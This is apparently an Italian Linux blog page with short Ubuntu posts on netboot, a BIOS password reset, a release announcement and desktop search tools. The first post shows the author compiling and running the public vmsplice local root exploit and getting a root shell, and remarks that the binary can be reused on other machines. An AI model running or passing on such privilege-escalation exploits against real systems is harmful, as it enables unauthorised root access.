ubuntu



vmsplice mi buca sia Feisty che Hardy :(

| |

utente@pc01:~/sources$ gcc vmsplice.c -static -Wno-format  -o vms
utente@pc01:~/sources$ ./vms
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f4b000 .. 0xb7f7d000
[+] root
root@pc01:~/sources# whoami

Una volta fatto il binario potete utilizzarlo anche su altre macchine, a patto che l'architettura sia la stessa.

Se siete maniaci della sicurezza (o haxor) date uno sguardo a Metasploit si tratta di un framework per testare i vari exploit. Un video autoesplicativo su milw0rm


HP Compaq nc4000 reset password e ubuntu netboot

| |

Mi hanno dato un bel portatile HP Compaq nc4000 col BIOS bloccato da password :)
Fortuna che è documentato abbastanza bene così ho scaricato il manuale ufficiale e l'ho disassemblato.

Nel manuale c'era scritto di togliere la batteria per 5min, ma non avevo nessuna voglia di stare a giochicchiare con le vitine, così come ho visto il cavetto RTC Clock l'ho tolto e poi ho provato a farlo partire da disassemblato.
Il BIOS si è resettato, quindi l'ho rimontato e evitando così di tolgliere qualche chilo di viti per arrivare alla batteria :)

In teoria sarebbe dovuto partire Windows XP, ma in pratica c'era un cursore nero lampeggiante.. vuoi vedere che l'hard disk se ne andato a p**tane?

Bisogna dire che il "coso", non ha lettore cd di serie, quindi ogni LiveCD era inutile in quel momento. Fortuna che scorgo nelò BIOS PXE, così provo per la prima volta a fare il netboot di Ubuntu.

Il sistema funziona davvero bene, ma c'è bisogno di un server con DHCP e TFTP e bisogna anche pacioccare un pochino col firewall. Ci sono tante guide più o meno obsolete per fare questa procedura, io vi consiglio QuickNetBoot. L'altro consiglio è: installate prima un sistema minimale col GRUB e quando riavviate continuate ad installare il resto che vi serve.

PS: Partite direttamente dalle immagini di Ubuntu 8.04 Hardy Heron e dovete usare la alternate :)


Linux Ubuntu proiettato alle Gru

| |

Vicino Torino c'è un grande centro commerciale "Le Gru"; oltre ai 190 negozi è possibile trovare degli stand che promuovono vari tipi di offerte (es. Fastweb. Ing Direct, Sky..) e uno di questi stand sta proiettando le webcam di Bardonecchia per invogliare le persone ad andare a sciare.

Dov'é la notizia? Nessun utilizzo mission critical di Linux, ma centinaia di persone all'ora si stanno vedendo le webcam su Firefox + Ubuntu!

Che dire, pubblicità gratis e la dimostrazione che Linux non è solo per freakkettoni e tecnici.


Ubuntu 7.10 "Gusty Gibbon" è arrivato!

|

Guardate gli
Screenshots
, ma visto che ci siete fate anche che provarlo che ne vale la pena.

In questo momento i server sono intasati e fate prima a scaricarlo con Emule o Bittorrent.

Tra le novità:

- Effetti 3D abilitati se supportati
- Miglior supporto per le stampanti e i driver proprietari
- Possibilà di installarlo su una partizione criptata
- Motore di ricerca interno per i file
- Installazione automatica (su richiesta) dei codec audio e video necessari
- Gnome 2.20

..e tanto altro


(Bill Gates che suggerisce di aggiornare Windows Vista ad Ubuntu)


Disinstallato Google Desktop per Ubuntu Linux

|

Non ne vale la pena, non è integrato più di tanto con GNOME, le configurazioni sono tutte pagine web e non mi supporta i metadata.. in compenso ho riscoperto Beagle, che malgrado tutto è il più maturo dei contendenti per Linux, non ti fonde la CPU come Tracker, ma soprattutto indicizza anche i tag XMP.

Qui il video.

Buona disinstallazione a tutti


Syndicate content